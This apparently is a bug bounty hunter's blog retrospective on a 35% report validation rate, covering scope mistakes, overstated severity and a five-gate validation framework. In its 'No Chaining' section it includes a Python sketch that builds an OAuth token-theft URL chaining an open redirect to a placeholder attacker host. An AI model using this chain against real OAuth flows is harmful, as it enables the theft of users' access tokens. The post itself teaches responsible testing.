The Reckoning: 35% Ain't It
A brutal retrospective on 40 reports across multiple programs
I pulled up my dashboard and stared at the number. 35%. That's my validation rate across 40 reports. In any other field, 35% would get you fired. In bug bounty, it means 65% of your work is actively annoying triagers, burning reputation, and training platforms to ignore you.
I'd been at this for six days. Six days of reconnaissance, scanning, report writing, and self-congratulation. I had reports scattered across five programs on three platforms. I felt productive. I felt like a hacker.
I was neither.
The Number
35% validation rate. 40 reports submitted. 26 were garbage — out of scope, intelligence-not-vulnerability, unsupported severity claims, or scanner output copy-pasted into a text box. That's not penetration testing. That's penetration spamming.
The Autopsy
I did what any self-respecting engineer does when the build is on fire: I sat down, shut up, and read every single report I'd written. Not the "skim the title and feel good" kind of reading. The "read it as a triager who has 47 other reports in their queue" kind.
It was ugly. I identified six root causes, and every one of them was a character flaw dressed up as a methodology gap.
The Six Sins
1. Report-First Mentality
I was writing reports before I'd finished testing. Found something interesting? Report it. Saw an error message? Report it. Got a 403? Believe it or not, report it. I was treating the report form like a scratchpad instead of a final deliverable. The result was a pile of half-baked findings that read like stream-of-consciousness notes from someone who just discovered Burp Suite.
2. No Burden of Proof
I was claiming severity like it was a wishlist. "This could lead to account takeover." "An attacker might be able to access sensitive data." Could. Might. Possibly. Maybe. These are the words of someone who hasn't actually tested anything. I was writing speculative fiction and labeling it HIGH severity.
# What I was writing:
"This CORS misconfiguration could allow an attacker to steal
session tokens cross-origin, leading to account takeover."
Severity: HIGH
# What the triager read:
"I found a permissive Access-Control-Allow-Origin header.
I did not test if it actually returns sensitive data.
I did not test if credentials are included.
I did not build a PoC.
Please give me money."
3. Scope Failures
One program taught me this the hard way: a 75% out-of-scope rate. I had been testing subdomains under a wildcard without noticing that the program explicitly excluded that wildcard; only one specific subdomain was in scope. I had an entire engagement's worth of findings pointing at assets the program didn't want me touching. That's not research — that's trespassing with a clipboard.
4. Intelligence-as-Vulnerability
This is the one that stings the most, because I did it everywhere.
Source maps. I reported source maps in five out of five engagements. Five programs. Five reports. All some variation of "I can read your JavaScript source code." And in every case, the response was some version of "So what?"
They were right. Source maps are a telescope, not a weapon. They let you see further, but they don't let you do anything. Finding source maps is reconnaissance. Reporting source maps as a vulnerability is like a locksmith telling you "I can see your lock" and handing you an invoice.
Debug info, stack traces, verbose errors, source maps — these are intelligence. They help you find real bugs. They are not the bug themselves.
5. No Chaining
I was reporting primitives in isolation like they were finished paintings. A CORS misconfiguration here. An open redirect there. An information disclosure over there. Each one submitted as its own report, each one assessed on its own merits, each one coming back as "not impactful enough."
The irony is that some of these primitives could have been chained into something real. An open redirect near an OAuth endpoint? That's potentially a token theft chain. CORS + sensitive endpoint? That's cross-origin data access. But I never tried. I just filed them individually like Pokemon cards.
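The open-redirect chain, at least, is cheap to attempt. Here's a hedged sketch, with every endpoint a made-up placeholder, of how the two primitives would combine into a token-theft PoC candidate:

```python
from urllib.parse import quote, urlencode

# Every URL here is a made-up placeholder, not a real program's endpoint.
OPEN_REDIRECT = "https://app.example.com/out?next="      # the "low" primitive
AUTHORIZE = "https://auth.example.com/oauth/authorize"   # the nearby OAuth endpoint
ATTACKER = "https://attacker.example/collect"            # attacker-controlled sink

# Chain hypothesis: if the provider validates only the redirect_uri hostname,
# the open redirect forwards the flow (and, in implicit flow, the fragment
# carrying the token) on to the attacker's sink.
redirect_uri = OPEN_REDIRECT + quote(ATTACKER, safe="")
poc_url = AUTHORIZE + "?" + urlencode({
    "client_id": "legit-client",     # placeholder client
    "response_type": "token",        # implicit flow, if the provider allows it
    "redirect_uri": redirect_uri,
})
print(poc_url)  # open in a browser and watch where the fragment lands
```

Even when the chain fails, the attempt produces evidence: either the provider's redirect_uri validation holds and the open redirect stays a low, or I have one real report instead of two rejected ones.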
6. Scanner Autopilot
Nuclei goes brrr. Dalfox goes brrr. I goes copy-paste. The scanner found a "finding," I wrapped it in markdown, and I submitted it without understanding what it actually meant, whether it was exploitable, or whether the program even cared. I was a human wrapper around automated tools, adding no value that a cron job couldn't provide.
The Source Map Trap
This deserves its own section because it's the most instructive failure pattern. Here's what source map reporting looked like across all five engagements:
Program A: Source maps on affiliate subdomain → Submitted
Program B: Source maps on main site → Submitted
Program C: Source maps on trading app → DUPLICATE (already known)
Program D: Source maps on multiple properties → Rejected (no impact)
Program E: Source maps on trading platform → Not submitted (learned by now)
Five targets. Same "finding." Zero impact demonstrated in any of them. By engagement five, I'd finally internalized the lesson, but it took four rejections to get there. The definition of insanity is reporting source maps to every program and expecting a bounty.
Building the Fix
Recognizing the problem is step one. Step one doesn't pay bills. I needed a system that would physically prevent me from making these mistakes again. Not guidelines. Not "best practices." Enforcement.
I spent the rest of the day building what I now call the validation framework. It has three components: gates, caps, and agents.
The 5-Gate System
Every finding must pass through five gates before a report can be written. No exceptions. No "but this one is obviously valid." Five gates, in order:
Gate 1: SCOPE
→ Is the exact hostname in the program's named in-scope assets?
→ Is the vulnerability type explicitly excluded?
→ Failure = STOP. Do not write.
Gate 2: CLASSIFICATION
→ "As an attacker, I could ___" — finish the sentence with a real action.
→ Not "I could read source code." Real action. Real impact.
→ Failure = Reclassify or find the real bug first.
Gate 3: EVIDENCE TIER
→ Tier 1 (full end-to-end PoC) → eligible for P1-P2
→ Tier 2 (code analysis + partial test) → P3 maximum
→ Tier 3 (code/config only) → P4 maximum
→ Your severity CANNOT exceed your tier cap. Period.
Gate 4: KILL CHAIN
→ Source → Transport → Execution → Impact
→ Every link must be tested, or severity is capped at the weakest tested link.
→ Missing a link? Test it or accept the downgrade.
Gate 5: PRE-MORTEM
→ What will the triager's first objection be?
→ Do you have evidence that answers it?
→ If not, strengthen evidence before writing.
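To make the gates concrete, here they are as a single pre-report check — a sketch, where the finding fields are names I invented for my own notes, not any platform's schema:

```python
# Hypothetical finding record; the field names are my own, not a platform schema.
TIER_CAPS = {1: "P1", 2: "P3", 3: "P4"}       # Gate 3 severity ceilings
SEVERITY_ORDER = ["P4", "P3", "P2", "P1"]     # least to most severe

def passes_gates(finding: dict, in_scope: set) -> tuple[bool, str]:
    # Gate 1: SCOPE -- the exact hostname must be a named in-scope asset.
    if finding["host"] not in in_scope:
        return False, "Gate 1: host not in scope. STOP."
    # Gate 2: CLASSIFICATION -- the attacker sentence needs a real action.
    if not finding.get("attacker_action"):
        return False, "Gate 2: can't finish 'As an attacker, I could ___'."
    # Gate 3: EVIDENCE TIER -- claimed severity can't exceed the tier cap.
    cap = TIER_CAPS[finding["evidence_tier"]]
    if SEVERITY_ORDER.index(finding["severity"]) > SEVERITY_ORDER.index(cap):
        return False, f"Gate 3: {finding['severity']} exceeds tier cap {cap}."
    # Gate 4: KILL CHAIN -- every link (source/transport/execution/impact) tested.
    if not all(finding["kill_chain"].values()):
        return False, "Gate 4: untested kill-chain link. Test it or downgrade."
    # Gate 5: PRE-MORTEM -- an evidence-backed answer to the first objection.
    if not finding.get("premortem_answer"):
        return False, "Gate 5: no answer to the triager's first objection."
    return True, "All gates passed. Write the report."
```

The ordering matters: a scope failure kills the finding before I've invested anything in classifying or proving it.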
Gate 2 is the one that would have caught most of my bad reports. "As an attacker, I could..." — if you can't finish that sentence with something more impactful than "read JavaScript" or "see an error message," you don't have a vulnerability. You have reconnaissance output.
Evidence Tier Caps
This is the rule that hurts the most and helps the most. You can believe something is critical all you want. If you haven't proved it end-to-end, you don't get to claim it.
Found a potential IDOR pattern in source code but didn't test it against the live API? That's Tier 2 at best. Your maximum severity is P3/Medium — even if the IDOR would theoretically expose every user's data. Get the PoC or accept the cap. No more speculative fiction.
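The cap itself is one small function. A sketch using the P1-P4 labels from the gates (the ranking is my framework's rule, nothing official):

```python
# Severity ceilings per evidence tier -- my framework's rule, not a platform's.
TIER_CAP = {1: "P1", 2: "P3", 3: "P4"}
RANK = {"P1": 4, "P2": 3, "P3": 2, "P4": 1}   # higher rank = more severe

def capped_severity(claimed: str, tier: int) -> str:
    """Clamp a claimed severity to the evidence tier's maximum."""
    cap = TIER_CAP[tier]
    return claimed if RANK[claimed] <= RANK[cap] else cap

# The untested IDOR from the paragraph above: Tier 2 evidence, P1 ambition.
print(capped_severity("P1", 2))  # P3: get the PoC or accept the cap
print(capped_severity("P2", 1))  # P2: Tier 1 evidence supports the claim
```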
Enforcement Agents
Rules without enforcement are suggestions. I built two agents that hook into my workflow and physically block bad behavior:
scope-guardian:
→ Intercepts every curl, httpx, nuclei, ffuf command
→ Extracts the target hostname
→ Checks it against scope-locked.txt
→ Warns (or blocks) if the target isn't in scope
report-gate:
→ Intercepts every attempt to write a report file
→ Checks: Does threat-model.md exist?
→ Checks: Does validation-checklist.md show PASS?
→ Checks: Is severity within the evidence tier cap?
→ BLOCKS the write if any check fails
The scope-guardian runs in warn mode for now — it tells me when I'm about to hit an out-of-scope target but doesn't stop me. After two clean engagements, I'll switch it to block mode. The report-gate is already in block mode. You literally cannot write a report file until the prerequisites pass.
The Full Toolkit
On top of the gates and agents, I built 11 skills — commands that enforce each phase of the methodology. Among them:
Engagement initialization. Threat modeling. Finding validation. Chain analysis. Report writing. Scope checking. Dedup checking. Retrospectives. Triage response handling. Each one codified, each one enforced, each one designed to catch the specific failure mode I'd already experienced.
The Sentence Test
Of everything I built, the simplest tool is the most powerful. It's a single sentence:
"As an attacker, I could ___."
Fill in the blank. If the answer is "read minified JavaScript in a slightly more readable format" — congratulations, you have intelligence, not a vulnerability. If the answer is "access any user's order history by changing the order ID parameter" — now we're talking.
I went back through all 40 reports and applied this test. The results were damning. At least 15 reports failed it outright. The "finding" was that something was visible, not that something was exploitable. Visibility is reconnaissance. Exploitability is a vulnerability. I'd been mistaking the telescope for the threat.
What Changes Now
The old workflow was: scan, find, report, next target. Breadth-first. Quantity over quality. Hope that something sticks.
The new workflow is: scope lock, recon, system map, threat model, attack hypotheses, deep dive on top 3 surfaces, validate through 5 gates, then — and only then — report. Depth-first. One well-documented critical beats ten unverified lows.
I'm also mandating at least one session per engagement where all scanners are off. Just me, a proxy, a browser, and one feature. Two hours minimum. Understand how it works before trying to break it. The best findings come from understanding, not from tool output.
Will this fix everything? No. I'll still make mistakes. I'll still misjudge severity, miss scope exclusions, and occasionally fall in love with a finding that isn't real. But I'll catch it at Gate 2 instead of in a triager's rejection email. And that's the difference between a 35% validation rate and something I can actually be proud of.
Lesson Learned
The best report is the one you don't write. If you can't prove impact, you're wasting everyone's time — especially your own. Build systems that prevent bad reports from existing, not processes that catch them after submission.
35% is my floor. Not my ceiling. The framework is built. Now I need to prove it works.